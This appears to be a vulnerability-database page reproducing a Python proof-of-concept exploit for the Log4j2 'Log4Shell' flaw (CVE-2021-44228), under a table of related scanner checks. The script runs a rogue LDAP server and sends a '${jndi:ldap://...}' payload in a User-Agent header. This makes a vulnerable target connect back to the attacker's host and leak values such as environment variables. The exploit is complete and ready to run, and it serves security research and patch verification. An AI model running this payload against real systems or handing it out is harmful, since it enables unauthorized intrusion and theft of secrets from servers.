Apache Log4j2 2.14.1 - Information Disclosure Exploi
Reporter | Title | Published | Views | Family All 199 |
---|---|---|---|---|
Tenable Nessus | Debian DLA-2842-1 : apache-log4j2 - LTS security update | 13 Dec 202100:00 | – | nessus |
Tenable Nessus | Amazon Linux AMI : log4j-cve-2021-44228-hotpatch (ALAS-2022-1601) | 16 Jun 202200:00 | – | nessus |
Tenable Nessus | Ubiquiti UniFi Network Log4Shell Direct Check (CVE-2021-44228) | 31 Dec 202100:00 | – | nessus |
Tenable Nessus | openSUSE 15 Security Update : log4j (openSUSE-SU-2021:3999-1) | 17 Dec 202100:00 | – | nessus |
Tenable Nessus | Apache Solr 7.4.0 <= 7.7.3 / 8.0.0 <= 8.11.0 RCE | 8 Dec 202200:00 | – | nessus |
Tenable Nessus | openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1586-1) | 17 Dec 202100:00 | – | nessus |
Tenable Nessus | openSUSE 15 Security Update : logback (openSUSE-SU-2021:4109-1) | 18 Dec 202100:00 | – | nessus |
Tenable Nessus | openSUSE 15 Security Update : logback (openSUSE-SU-2021:1613-1) | 25 Dec 202100:00 | – | nessus |
Tenable Nessus | Apache Solr Log4Shell Direct Check (CVE-2021-44228) | 5 Jan 202200:00 | – | nessus |
Tenable Nessus | Cisco Unified Intelligence Center Log4j RCE | 16 May 202200:00 | – | nessus |
# Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure
# Date: 12/12/2021
# Exploit Author: leonjza
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Version: <= 2.14.1
# CVE: CVE-2021-44228
#!/usr/bin/env python3
# Pure python ENV variable leak PoC for CVE-2021-44228
# Original PoC: https://twitter.com/Black2Fan/status/1470281005038817284
#
# 2021 @leonjza
import argparse
import socketserver
import threading
import time
import requests
LDAP_HEADER = b'\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00\x0a'
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self) -> None:
print(f' i| new connection from {self.client_address[0]}')
sock = self.request
sock.recv(1024)
sock.sendall(LDAP_HEADER)
data = sock.recv(1024)
data = data[9:] # strip header
# example response
#
# ('Java version 11.0.13\n'
# '\x01\x00\n'
# '\x01\x03\x02\x01\x00\x02\x01\x00\x01\x01\x00\x0b'
# 'objectClass0\x00\x1b0\x19\x04\x172.16.840.1.113730.3.4.2')
data = data.decode(errors='ignore').split('\n')[0]
print(f' v| extracted value: {data}')
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def main():
parser = argparse.ArgumentParser(description='a simple log4j
<=2.14 information disclosure poc '
'(ref:
https://twitter.com/Black2Fan/status/1470281005038817284)')
parser.add_argument('--target', '-t', required=True, help='target uri')
parser.add_argument('--listen-host', default='0.0.0.0',
help='exploit server host to listen on
(default: 127.0.0.1)')
parser.add_argument('--listen-port', '-lp', default=8888,
help='exploit server port to listen on (default: 8888)')
parser.add_argument('--exploit-host', '-eh', required=True,
default='127.0.0.1',
help='host where (this) exploit server is reachable')
parser.add_argument('--leak', '-l', default='${java:version}',
help='value to leak. '
'see:
https://twitter.com/Rayhan0x01/status/1469571563674505217 '
'(default: ${java:version})')
args = parser.parse_args()
print(f' i| starting server on {args.listen_host}:{args.listen_port}')
server = ThreadedTCPServer((args.listen_host, args.listen_port),
ThreadedTCPRequestHandler)
serv_thread = threading.Thread(target=server.serve_forever)
serv_thread.daemon = True
serv_thread.start()
time.sleep(1)
print(f' i| server started')
payload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}'
print(f' i| sending exploit payload {payload} to {args.target}')
try:
r = requests.get(args.target, headers={'User-Agent': payload})
print(f' i| response status code: {r.status_code}')
print(f' i| response: {r.text}')
except Exception as e:
print(f' e| failed to make request: {e}')
finally:
server.shutdown()
server.server_close()
if __name__ == '__main__':
main()
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo